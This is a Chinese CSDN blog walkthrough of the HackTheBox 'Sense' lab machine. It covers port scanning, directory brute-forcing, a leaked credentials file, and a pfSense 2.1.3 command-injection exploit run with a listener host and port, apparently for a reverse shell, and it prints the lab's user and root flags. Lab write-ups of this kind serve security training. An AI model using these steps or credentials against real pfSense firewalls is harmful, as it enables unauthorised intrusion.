[Meachines] [Easy] Sense PFSense防火墙RCE

于 2024-08-04 04:17:45 发布
阅读量206 收藏 1
点赞数 1
分类专栏: HackTheBox 文章标签: 网络安全
Whoami? Martin
本文链接:https://blog.csdn.net/qq_51886509/article/details/140901035
版权

信息收集

IP AddressOpening Ports
10.10.10.60TCP:80,443

$ nmap -p- 10.10.10.60 --min-rate 1000 -sC -sV

PORT    STATE SERVICE  VERSION
80/tcp  open  http     lighttpd 1.4.35
|_http-title: Did not follow redirect to https://10.10.10.60/
|_http-server-header: lighttpd/1.4.35
443/tcp open  ssl/http lighttpd 1.4.35
|_http-title: Login
| ssl-cert: Subject: commonName=Common Name (eg, YOUR name)/organizationName=CompanyName/stateOrProvinceName=Somewhere/countryName=US
| Not valid before: 2017-10-14T19:21:35
|_Not valid after:  2023-04-06T19:21:35
|_ssl-date: TLS randomness does not represent time
|_http-server-header: lighttpd/1.4.35

HTTPS

https://10.10.10.60/

image.png

$ gobuster dir -u "https://10.10.10.60/" -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -x html,txt,php -b 404,403 -t 50 -k

$ curl "https://10.10.10.60/system-users.txt" -k

image-2.png

username:rohit password:pfsense

image-1.png

PFSense防火墙-RCE

image-4.png

$ searchsploit -w PFSense 2.1.3

image-5.png

pfSense的status_rrd_graph_img.php页面在处理graph参数时存在命令注入漏洞。尽管对graph参数进行了正则表达式过滤,但管道字符(|)未被移除。通过使用八进制编码,可以绕过非法字符的过滤,注入并执行任意操作系统命令。

$ python3 exp.py --rhost 10.10.10.60 --lhost 10.10.16.14 --lport 10032 --username rohit --password pfsense

image-6.png

User.txt

8721327cc232073b40d27d9c17e7348b

Root.txt

d08c32a5d4f8c8b10e76eb51a69f1a86

Мартин.
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【网络系统集成】Pfsense防火墙实验
weixin_52553215的博客
07-09 1279
防火墙是一种边界安全设备,它可以通过配置WAN、LAN规则来筛选网络流量以限制网络活动,也可以通过配置端口映射来使WAN的一个端口对应到内网的某一台主机,使WAN网可以远程访问LAN的某台主机。这次实验涉及到虚拟机的网络配置、pfsense网络与规则的配置等许多方面,经过上网查找资料与与同学相互讨论、尝试,逐渐理清了实验的网络结构与原理以及相互之间的关系,问题一个一个被解决,受益匪浅。在虚拟网络编辑器中,添加一个自定义的仅主机模式的网络,并取消此网络的DHCP服务,将这两个网卡都划分到这一网络下。
PFsense 防火墙使用
欢迎来到我的博客
12-09 2575
1.配置网桥 2.配置规则 3.每一个lan口都配置规则 4.配置如下 5.可实现同一网桥下的lan口设备互通
pfSense 防火墙Floating(浮动)规则详解
weixin_33869377的博客
09-16 673
什么是Floating(浮动)规则?官方解释:(摘自https://www.netgate.com/docs/pfsense/firewall/floating-rules.html)浮动规则浮动规则是高级防火墙规则,可以在任何方向和任何或多个接口应用。浮动规则在“ 浮动”选项卡上的“防火墙>规则”下定义。许多防火墙不需要任何浮动规则,也可能只有流量×××器。对于那些选择使用它们的人来说,他...
pfSense防火墙查看NDP邻居无响应
风云刀的CSDN博客
08-22 268
pfSense防火墙查看NDP表无响应
pfSense防火墙配置DHCPv6-PD获取IPv6地址
风云刀的CSDN博客
08-22 3696
pfSense通过DHCPv6获取IPv6地址
pfSense软件防火墙安装配置
abtmh02622的专栏
12-29 827
一,说明 1.1 pfSense是什么 pfSense是基于FreeBSD的、开源中最为可靠(World's Most Trusted Open Source Firewall)的、可与商业级防火墙一战(It has successfully replaced every big name commercial firewall you can imagine in numerous...
pfSense book之防火墙(一)
weixin_33701617的博客
11-06 961
防火墙防火墙基础入口过滤出口过滤简介防火墙规则别名防火墙规则配置实例规则方法配置防火墙规则浮动规则使用其他公网IP地址的方法虚拟IP地址基于时间的规则查看防火墙日志如何封锁访问一个网站?故障排除防火墙规则pfSense执行的主要功能之一是过滤流量。本章包括防火墙基本原理,最佳实践以及配置防火墙规则所需的必要信息。防火墙基础知识本节主要介绍防火墙概念,为理解、使用pfSense...
PfSense防火墙设置L2TP+IPsec配置
weixin_34354945的博客
09-16 1058
L2TP使我们日常使用很广泛的,如何在Pfsense上配置L2TP+IPsec呢?首先我们来设置L2TP Server注意:L2TP Server设置比较简单,请注意Server Address 是指L2tp的服务器地址,不是公网地址切勿搞错。下面是IPsec部分设置添加用户请使用动态IP 下面进行IPSec部分设置 首先勾选:Enable IPsec Mobile Client Suppor...
自建家用防火墙-pfSense
热门推荐
BBM的博客
03-10 1万+
pfSense防火墙具有:包过滤功能、NAT模式部署、负载均衡,双机热备、VPN等重要功能,支持报告生成功能,还可以通过SNMP进行集中管理。在开源防火墙市场中,pfSense占有领先的地位。这里我们说一下家用系统为什么需要防火墙,对于灵活就业的软件开发者来说,在家办,下载,搭建开发平台等,另外还有个人和家庭的照片等资料防止未经授权外传,防火墙就比较重要了。另一方面目前宽带业务最小到桌面的也有200Mbps,500Mbps也不鲜见了,如果出现黑客攻击,或文件外传,一晚上就可以传出去1TB左右的数据,所以家用
ansible-pfsense:用于管理pfSense防火墙的Ansible模块
01-31
Ansible-pfsense / pfsensible.core 这是一组模块,可用于配置ansible pfSense防火墙。使用Ansible星系进行安装Ansible Galaxy(从2.9版开始)现在具有收藏选项。 集合是一种分发格式,用于交付所有类型的Ansible...
Pfsense防火墙方案.pdf
11-04
Pfsense防火墙方案.pdf
pfSense防火墙从XSS到RCE(CVE-2023-42325 CVE-2023-42327).txt
04-22
pfSense防火墙从XSS到RCE(CVE-2023-42325 CVE-2023-42327).txt
Pfsense:配置防火墙Pfsense
02-10
Pfsense:配置防火墙Pfsense
pfsense_xmlrpc_backdoor:通过 xmlrpc.php 在 pfSense 防火墙上放置 PHP 后门的简单示例
06-12
快速介绍这是一个示例有效负载以及滥用 pfSense 的 xmlrpc.php 函数来建立后门并获得对 pfSense 防火墙的根级访问权限的示例。 这个漏洞是post-auth的(对于管理员账户),根据pfSense安全团队的说法,它被认为不是...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8362
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
煎蛋.rar
最新发布
08-04
小程序的设计源码通常包含多个文件和文件夹,组织结构清晰,以便开发者能够快速上手并进行定制化开发。主要文件和文件夹包括: 页面文件夹:存放小程序的各个页面,每个页面通常由.wxml、.wxss、.js和.json文件组成。WXML文件负责页面的结构,类似于HTML;WXSS文件负责样式,类似于CSS;JS文件负责页面的逻辑和交互;JSON文件用于页面的配置,如导航栏标题等。 组件文件夹:存放可复用的UI组件。组件与页面类似,也由.wxml、.wxss、.js和.json文件组成。通过组件化设计,可以提高代码的复用性和维护性,减少重复工作。 静态资源文件夹:存放图片、音频、视频等静态资源,便于在小程序中引用。这些资源通常放在一个名为assets或static的文件夹中。 配置文件:小程序的根目录下通常有一个app.json文件,用于全局配置,如页面路径、导航栏样式、底部Tab栏等。此外,还有app.wxss和app.js文件,分别用于全局样式和全局逻辑。 工具文件夹:存放一些工具函数和库文件,便于在小程序中调用。这些文件通常放在一个名为utils的文件夹中。
DirectX修复工具,(DirectX Repair)是一款系统级工具软件, 简便易用 【修复完成后重启电脑】
08-04
安装包
下半年工作总结PPT模板.pptx
08-04
【作品名称】:述职报告,工作计划,工作总结,计划书,商务计划,转正报告 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
pfsense防火墙中通过一个路由连接另一个pfsense防火墙应该怎么配置
03-29
在第一个pfsense防火墙中,需要创建一个新的网关,并将其指向另一个pfsense防火墙的IP地址。然后,需要创建一个新的路由,将流量路由到该网关。 具体步骤如下: 1. 登录第一个pfsense防火墙的Web管理界面。 2. 在左侧菜单中选择“System” -> “Routing” -> “Gateways”。 3. 点击“Add”创建一个新的网关。在“Interface”字段中选择与第二个pfsense防火墙相连的接口,例如“WAN”。在“Gateway”字段中输入第二个pfsense防火墙的IP地址,并设置其他选项如需。 4. 点击“Save”保存新的网关。 5. 在左侧菜单中选择“System” -> “Routing” -> “Static Routes”。 6. 点击“Add”创建一个新的路由。在“Destination network”字段中输入要路由的目标网络,例如“192.168.2.0/24”。在“Gateway”字段中选择先前创建的新网关。 7. 点击“Save”保存新的路由。 重复以上步骤,将另一个pfsense防火墙中的流量路由到第一个pfsense防火墙。在第二个pfsense防火墙中,需要创建一个新的网关和路由,将其指向第一个pfsense防火墙的IP地址。然后,将流量路由到该网关。 最后,测试连接是否正常。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值